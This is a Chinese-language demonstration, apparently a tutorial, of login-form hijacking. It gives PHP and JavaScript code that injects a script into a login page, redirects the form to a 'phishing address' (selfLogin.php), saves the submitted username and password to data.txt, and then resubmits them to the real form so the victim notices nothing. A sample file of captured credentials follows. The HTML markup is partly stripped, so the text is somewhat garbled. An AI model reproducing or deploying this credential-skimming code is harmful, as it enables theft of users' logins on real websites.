目录介绍
login.php 正常登录的文件
selfLogin.php 自定义的登录文件
data.txt 记录用户输入的数据
login.php
echo "
";
$userInfo = $_POST ;
if ($userInfo) {
# code...
var_dump($userInfo,'登录成功') ;exit();
}
?>
登录用户姓名:
用户密码:
//js劫持代码
window.onload = function (eve) {
var form = document.getElementById('login');
form.innerHTML = '
用户姓名: 用户密码: ' ;//钓鱼地址
form.action = "selfLogin.php" ;
}
selfLogin.php
$name = '' ;
$pwd = '' ;
//var_dump('数据被截取了',$_POST) ;
if($_POST) {
//记录获取的数据信息
$name = $_POST['name'] ;
$pwd = $_POST['pwd'] ;
file_put_contents('data.txt', json_encode($_POST,true)) ;
}
?>
//构建之前的页面
window.onload = function (eve) {
var name = '<?php echo $name; ?>' ;
var pwd = '<?php echo $pwd; ?>' ;
if(name && pwd) {
var div = document.createElement('div');
document.body.appendChild(div);
div.innerHTML ='
'+' 用户姓名: 用户密码: ' ;
document.getElementById('login2').submit();
}
}
data.txt
{"name":"admin","pwd":"123456"}